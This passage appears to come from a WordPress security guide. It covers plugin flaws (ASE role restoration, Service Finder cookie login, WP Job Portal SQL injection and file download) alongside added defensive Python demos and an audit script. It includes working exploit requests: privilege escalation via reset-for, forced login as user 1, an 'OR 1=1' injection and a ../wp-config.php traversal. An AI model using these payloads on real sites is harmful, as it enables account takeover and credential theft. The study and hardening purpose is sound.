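Added example, not from the theme or the page: a Python model of the path-containment rule in the tip (resolve the real path, then require the base directory plus trailing separator as prefix), exercised against a throwaway directory tree. It shows three cases a bare string-prefix check gets wrong: ../ traversal, a sibling directory whose name starts with the base name (uploads-evil), and a symlink inside the fonts directory that resolves outside it. The sanitiser here is a simplified stand-in for WordPress's sanitize_file_name(), not a port of it, and the directory layout is constructed for the demo.

```python
import os
import shutil
import tempfile


def sanitize_file_name(name):
    """Simplified model of a filename sanitiser (NOT WordPress's sanitize_file_name()):
    keep only the last path component, drop non-printable characters and reject '.'/'..'."""
    name = name.replace("\\", "/").split("/")[-1]
    name = "".join(ch for ch in name if ch.isprintable())
    return "" if name in ("", ".", "..") else name


def contained_path(base_dir, subdir, user_name):
    """Resolve base_dir/subdir/user_name and return it only if it stays strictly under base_dir
    after symlink resolution; mirrors realpath() + str_starts_with() with a trailing separator."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, subdir, user_name))
    if candidate == base or not candidate.startswith(base + os.sep):
        return None
    return candidate


def safe_delete_font_dir(uploads_dir, raw_name):
    """The hardened flow: sanitise, contain, then delete. Returns (status, resolved_path)."""
    name = sanitize_file_name(raw_name)
    if not name:
        return ("rejected: empty name", None)
    target = contained_path(uploads_dir, "litho-fonts", name)
    if target is None:
        return ("rejected: outside uploads", None)
    if not os.path.isdir(target):
        return ("not found", target)
    os.rmdir(target)  # a font family is one directory here; real code would remove recursively
    return ("deleted", target)


def demo():
    """Build a throwaway tree, run the checks against it and return the outcomes."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "uploads")
    os.makedirs(os.path.join(uploads, "litho-fonts", "roboto"))
    os.makedirs(os.path.join(root, "uploads-evil"))            # sibling sharing the prefix
    open(os.path.join(root, "wp-config.php"), "w").close()     # the file an attacker would aim at
    os.symlink(root, os.path.join(uploads, "litho-fonts", "escape"))  # symlink pointing outside
    try:
        return {
            "traversal": contained_path(uploads, "litho-fonts", "../../../../wp-config.php"),
            "sibling_prefix": contained_path(uploads, "", "../uploads-evil"),
            "symlink": contained_path(uploads, "litho-fonts", "escape"),
            "legit": contained_path(uploads, "litho-fonts", "roboto") is not None,
            "delete_traversal": safe_delete_font_dir(uploads, "../../../../wp-config.php")[0],
            "delete_legit": safe_delete_font_dir(uploads, "roboto")[0],
            "config_survives": os.path.exists(os.path.join(root, "wp-config.php")),
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case}: {outcome}")
```

The sanitiser and the containment check are deliberately independent layers: the sanitiser removes traversal from the name, and the containment check catches what a name alone cannot express (the symlink case), so dropping either one leaves a gap.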
Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role")
Many plugins implement a "view as role" or temporary role-switching feature by saving the original role(s) in user meta so they can be restored later. If the restore path relies only on request parameters (e.g., $_REQUEST['reset-for']) and a plugin-maintained list without checking capabilities and a valid nonce, this becomes a vertical privilege escalation.
A real-world example was found in the Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). The reset branch restored roles based on reset-for=<username> if the username appeared in the internal array $options['viewing_admin_as_role_are'], but did not perform either a current_user_can() check or nonce verification before removing the current roles and re-adding the saved roles from the user meta _asenha_view_admin_as_original_roles:
```php
// Simplified vulnerable pattern
if ( isset( $_REQUEST['reset-for'] ) ) {
    $reset_for_username = sanitize_text_field( $_REQUEST['reset-for'] );
    $usernames = get_option( ASENHA_SLUG_U, [] )['viewing_admin_as_role_are'] ?? [];
    if ( in_array( $reset_for_username, $usernames, true ) ) {
        $u = get_user_by( 'login', $reset_for_username );
        foreach ( $u->roles as $role ) { $u->remove_role( $role ); }
        $orig = (array) get_user_meta( $u->ID, '_asenha_view_admin_as_original_roles', true );
        foreach ( $orig as $r ) { $u->add_role( $r ); }
    }
}
```
Why it's exploitable
- Trusts $_REQUEST['reset-for'] and a plugin option without server-side authorization.
- If a user previously had elevated privileges saved in _asenha_view_admin_as_original_roles and was later downgraded, they can restore them by hitting the reset path.
- In some deployments, any authenticated user could trigger the reset for another username still present in viewing_admin_as_role_are (broken authorization).
Attack prerequisites
- Vulnerable plugin version with the feature enabled.
- Target account has a stale high-privilege role saved in user meta from earlier use.
- Any authenticated session; no nonce/capability on the reset flow.
Exploitation (example)
```bash
# While logged in as the downgraded user (or any auth user able to trigger the code path),
# hit any route that executes the role-switcher logic and include the reset parameter.
# The plugin uses $_REQUEST, so GET or POST works. The exact route depends on the plugin hooks.
curl -s -k -b 'wordpress_logged_in=...' \
  'https://victim.example/wp-admin/?reset-for=<your_username>'
```
On vulnerable builds this removes the current roles and re-adds the saved original roles (e.g., administrator), effectively escalating privileges.
Detection checklist
- Look for role-switching features that persist "original roles" in user meta (e.g., _asenha_view_admin_as_original_roles).
- Identify reset/restore paths that:
  - Read usernames from $_REQUEST / $_GET / $_POST.
  - Modify roles via add_role() / remove_role() without current_user_can() and wp_verify_nonce() / check_admin_referer().
  - Authorize based on a plugin option array (e.g., viewing_admin_as_role_are) rather than the actor's capabilities.
Hardening
- Enforce capability checks on every state-changing branch (e.g., current_user_can('manage_options') or stricter).
- Require nonces for all role/permission changes and verify them: check_admin_referer() / wp_verify_nonce().
- Never trust request-supplied usernames; resolve the target user server-side based on the authenticated actor and explicit policy.
- Invalidate "original roles" state on profile/role updates to avoid stale high-privilege restoration:
```php
add_action( 'profile_update', function( $user_id ) {
    delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' );
}, 10, 1 );
```
- Consider storing minimal state and using time-limited, capability-guarded tokens for temporary role switching.
Unauthenticated privilege escalation via cookie-trusted user switching on public init (Service Finder "sf-booking")
Some plugins wire user-switching helpers to the public init hook and derive identity from a client-controlled cookie. If the code calls wp_set_auth_cookie() without verifying authentication, capability and a valid nonce, any unauthenticated visitor can force a login as an arbitrary user ID.
Typical vulnerable pattern (simplified from Service Finder Bookings ≤ 6.1):
```php
function service_finder_submit_user_form(){
    if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) {
        $user_id = intval( sanitize_text_field($_GET['switch_user']) );
        service_finder_switch_user($user_id);
    }
    if ( isset($_GET['switch_back']) ) {
        service_finder_switch_back();
    }
}
add_action('init', 'service_finder_submit_user_form');

function service_finder_switch_back() {
    if ( isset($_COOKIE['original_user_id']) ) {
        $uid = intval($_COOKIE['original_user_id']);
        if ( get_userdata($uid) ) {
            wp_set_current_user($uid);
            wp_set_auth_cookie($uid); // 🔥 sets auth for attacker-chosen UID
            do_action('wp_login', get_userdata($uid)->user_login, get_userdata($uid));
            setcookie('original_user_id', '', time() - 3600, '/');
            wp_redirect( admin_url('admin.php?page=candidates') );
            exit;
        }
        wp_die('Original user not found.');
    }
    wp_die('No original user found to switch back to.');
}
```
Why it's exploitable
- The public init hook makes the handler reachable by unauthenticated users (no is_user_logged_in() guard).
- Identity is derived from a client-modifiable cookie (original_user_id).
- A direct call to wp_set_auth_cookie($uid) logs the requester in as that user without any capability/nonce check.
Exploitation (unauthenticated)
```http
GET /?switch_back=1 HTTP/1.1
Host: victim.example
Cookie: original_user_id=1
User-Agent: PoC
Connection: close
```
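Added example, not from any of the plugins discussed, covering the detection checklists of the Litho, ASE and Service Finder sections at once: a small static audit script over PHP source that resolves each add_action() string callback, follows same-file function calls transitively, and reports unauthenticated entry points (wp_ajax_nopriv_ hooks and the public init hook) whose reachable code hits a filesystem or identity sink without any nonce or capability guard. The PHP it scans is constructed for the demo and modelled on the page's patterns; the brace matcher ignores braces inside strings and does not resolve array(...) callbacks, so treat its output as a triage list, not proof.

```python
import re

GUARDS = ("check_ajax_referer(", "wp_verify_nonce(", "check_admin_referer(",
          "current_user_can(", "is_user_logged_in(")
SINKS = ("unlink(", "->delete(", "copy(", "rename(", "wp_set_auth_cookie(", "wp_set_current_user(",
         "add_role(", "remove_role(", "wp_insert_user(", "wp_create_user(")
UNTRUSTED = ("$_REQUEST", "$_GET", "$_POST", "$_COOKIE")
PUBLIC_HOOKS = ("init", "wp_loaded", "template_redirect", "rest_api_init")

FUNC_RE = re.compile(r"\bfunction\s+([A-Za-z_]\w*)\s*\([^)]*\)\s*\{")
ACTION_RE = re.compile(r"add_action\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([A-Za-z_]\w*)['\"]")


def extract_functions(src):
    """Map function name -> body text via brace matching (braces inside strings are not handled)."""
    funcs = {}
    for m in FUNC_RE.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        funcs[m.group(1)] = src[m.end():i - 1]
    return funcs


def reachable_code(funcs, entry):
    """Body of the entry callback plus every same-file function it transitively calls."""
    seen, stack, chunks = set(), [entry], []
    while stack: 
        name = stack.pop()
        if name in seen or name not in funcs:
            continue
        seen.add(name)
        chunks.append(funcs[name])
        for callee in re.findall(r"\b([A-Za-z_]\w*)\s*\(", funcs[name]):
            if callee in funcs and callee not in seen:
                stack.append(callee)
    return "\n".join(chunks)


def audit(src):
    """Findings for each add_action() registration whose reachable code has sinks but no guards.
    Severity is 'high' for unauthenticated entry points, 'medium' for logged-in-only ones."""
    funcs = extract_functions(src)
    findings = []
    for hook, callback in ACTION_RE.findall(src):
        unauthenticated = hook.startswith("wp_ajax_nopriv_") or hook in PUBLIC_HOOKS
        code = reachable_code(funcs, callback)
        sinks = [s for s in SINKS if s in code]
        guards = [g for g in GUARDS if g in code]
        if sinks and not guards:
            findings.append({"hook": hook, "callback": callback, "sinks": sinks,
                             "untrusted_input": [u for u in UNTRUSTED if u in code],
                             "severity": "high" if unauthenticated else "medium"})
    return findings


# Constructed plugin source for the demo (modelled on the patterns in the sections above).
SAMPLE_PLUGIN = r'''<?php
function demo_remove_font() {
    if ( empty( $_POST['fontfamily'] ) ) { return; }
    $dir = wp_upload_dir()['basedir'] . '/fonts/' . $_POST['fontfamily'];
    $fs = demo_fs();
    $fs->delete( $dir, FS_CHMOD_DIR );
    die();
}
function demo_fs() { return Demo_Filesystem::init(); }
add_action( 'wp_ajax_demo_remove_font', 'demo_remove_font' );
add_action( 'wp_ajax_nopriv_demo_remove_font', 'demo_remove_font' );

function demo_switch_form() {
    if ( isset( $_GET['switch_back'] ) ) { demo_switch_back(); }
}
function demo_switch_back() {
    $uid = intval( $_COOKIE['original_user_id'] );
    wp_set_current_user( $uid );
    wp_set_auth_cookie( $uid );
}
add_action( 'init', 'demo_switch_form' );

function demo_safe_delete() {
    if ( ! current_user_can( 'manage_options' ) ) { wp_send_json_error( 'forbidden', 403 ); }
    check_ajax_referer( 'demo_nonce' );
    unlink( demo_contained_path( $_POST['name'] ) );
}
add_action( 'wp_ajax_demo_safe_delete', 'demo_safe_delete' );
'''

if __name__ == "__main__":
    for f in audit(SAMPLE_PLUGIN):
        print(f)
```

A guard anywhere in the reachable code counts, so the script will not flag a handler that checks the capability in a helper; conversely it cannot tell whether the guard actually gates the sink, which is the part a human reviewer still has to confirm.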
WAF considerations for WordPress/plugin CVEs
Generic edge/server WAFs are tuned for broad patterns (SQLi, XSS, LFI). Many high-impact WordPress/plugin vulns are application-specific logic/auth bugs that look like benign traffic unless the engine understands WordPress routes and plugin semantics.
Offensive notes
- Target plugin-specific endpoints with clean payloads: admin-ajax.php?action=..., wp-json/<namespace>/<route>, custom file handlers, shortcodes.
- Exercise unauthenticated paths first (AJAX nopriv, REST with permissive permission_callback, public shortcodes). Default payloads often succeed without obfuscation.
- Typical high-impact cases: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect.
Defensive notes
- Don't rely on generic WAF signatures to protect plugin CVEs. Implement application-layer, vulnerability-specific virtual patches or update quickly.
- Prefer positive-security checks in code (capabilities, nonces, strict input validation) over negative regex filters.
WordPress Protection
Regular Updates
Make sure WordPress, plugins, and themes are up to date. Also confirm that automated updating is enabled in wp-config.php:
```php
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
```
Also, install only trustable WordPress plugins and themes.
Security Plugins
Other Recommendations
- Remove the default admin user
- Use strong passwords and 2FA
- Periodically review users' permissions
- Limit login attempts to prevent Brute Force attacks
- Rename the wp-admin.php file and allow access only internally or from certain IP addresses.
Unauthenticated SQL Injection via insufficient validation (WP Job Portal <= 2.3.2)
The WP Job Portal recruitment plugin exposed a savecategory task that ends up executing the following vulnerable code inside modules/category/model.php::validateFormData():
```php
$category = WPJOBPORTALrequest::getVar('parentid');
$inquery = ' ';
if ($category) {
    $inquery .= " WHERE parentid = $category "; // <-- direct concat ✗
}
$query = "SELECT max(ordering)+1 AS maxordering FROM "
    . wpjobportal::$_db->prefix . "wj_portal_categories " . $inquery; // executed later
```
Issues introduced by this snippet:
- Unsanitised user input – parentid comes straight from the HTTP request.
- String concatenation inside the WHERE clause – no is_numeric() / esc_sql() or prepared statement.
- Unauthenticated reachability – although the action is executed through admin-post.php, the only check in place is a CSRF nonce (wp_verify_nonce()), which any visitor can harvest from a public page that embeds the [wpjobportal_my_resumes] shortcode.
Exploitation
- Grab a fresh nonce:
```bash
curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
```
- Inject arbitrary SQL by abusing parentid:
```bash
curl -X POST https://victim.com/wp-admin/admin-post.php \
  -d 'task=savecategory' \
  -d '_wpnonce=<nonce>' \
  -d 'parentid=0 OR 1=1-- -' \
  -d 'cat_title=pwn' -d 'id='
```
The response discloses the result of the injected query or alters the database, proving SQLi.
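The page's point that a numeric check or a prepared statement would have prevented this is shown below in an added Python example (not the plugin's code), using an in-memory SQLite table shaped like wj_portal_categories: the concatenating variant mirrors the plugin's query, including its PHP-style "falsy parentid means no WHERE clause" branch, and the parameterised variant validates the type and binds the value. The table name, rows and prefix are constructed.

```python
import sqlite3


def setup_db():
    """In-memory stand-in for the plugin table; rows and the wp_ prefix are constructed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_wj_portal_categories (id INTEGER PRIMARY KEY, parentid INTEGER, ordering INTEGER)")
    db.executemany("INSERT INTO wp_wj_portal_categories VALUES (?, ?, ?)",
                   [(1, 0, 1), (2, 0, 2), (3, 1, 1), (4, 1, 2), (5, 2, 7)])
    return db


def _is_falsy_like_php(value):
    """PHP's if ($category) treats null, '', 0 and '0' as false; mirror that for both variants."""
    return value in (None, "", 0, "0")


def max_ordering_vulnerable(db, parentid):
    """Mirrors the plugin's concatenation: the value lands in the SQL text unquoted."""
    inquery = ""
    if not _is_falsy_like_php(parentid):
        inquery = f" WHERE parentid = {parentid} "
    query = "SELECT max(ordering)+1 AS maxordering FROM wp_wj_portal_categories" + inquery
    return db.execute(query).fetchone()[0]


def max_ordering_safe(db, parentid):
    """Validate that parentid is a non-negative integer, then bind it as a parameter."""
    if _is_falsy_like_php(parentid):
        return db.execute("SELECT max(ordering)+1 FROM wp_wj_portal_categories").fetchone()[0]
    if not (isinstance(parentid, int) or (isinstance(parentid, str) and parentid.isdigit())):
        raise ValueError("parentid must be a non-negative integer")
    return db.execute("SELECT max(ordering)+1 FROM wp_wj_portal_categories WHERE parentid = ?",
                      (int(parentid),)).fetchone()[0]


def compare(db, value):
    """Run both variants on the same input; 'rejected' marks a validation failure on the safe side."""
    try:
        safe = max_ordering_safe(db, value)
    except ValueError:
        safe = "rejected"
    return {"vulnerable": max_ordering_vulnerable(db, value), "safe": safe}


if __name__ == "__main__":
    db = setup_db()
    for value in ("1", "0", "0 OR 1=1-- -"):
        print(repr(value), "->", compare(db, value))
```

With parentid=1 both variants agree on 3 (the next ordering under parent 1). With the page's payload the concatenated WHERE clause becomes `parentid = 0 OR 1=1` with the rest commented out, so the query silently ranges over every row and returns 8, while the safe variant refuses the input before any SQL is built; the comparison is visible only because the vulnerable query's output differs, which is the same signal the page describes for confirming the injection.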
Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)
Another task, downloadcustomfile, allowed visitors to download any file on disk via path traversal. The vulnerable sink is located in modules/customfield/model.php::downloadCustomUploadedFile():
```php
$file = $path . '/' . $file_name;
...
echo $wp_filesystem->get_contents($file); // raw file output
```
$file_name is attacker-controlled and concatenated without sanitisation. Again, the only gate is a CSRF nonce that can be obtained from the resume page.
Exploitation
```bash
curl -G https://victim.com/wp-admin/admin-post.php \
  --data-urlencode 'task=downloadcustomfile' \
  --data-urlencode '_wpnonce=<nonce>' \
  --data-urlencode 'upload_for=resume' \
  --data-urlencode 'entity_id=1' \
  --data-urlencode 'file_name=../../../wp-config.php'
```
The server responds with the contents of wp-config.php, leaking DB credentials and auth keys.
References
- Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme
- Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin
- Rare Case of Privilege Escalation in ASE Plugin Affecting 100k+ Sites
- ASE 7.6.3 changeset – delete original roles on profile update
- Hosting security tested: 87.8% of vulnerability exploits bypassed hosting defenses
- WooCommerce Payments ≤ 5.6.1 – Unauth privilege escalation via trusted header (Patchstack DB)
- Hackers exploiting critical WordPress WooCommerce Payments bug
- Unpatched Privilege Escalation in Service Finder Bookings Plugin
- Service Finder Bookings privilege escalation – Patchstack DB entry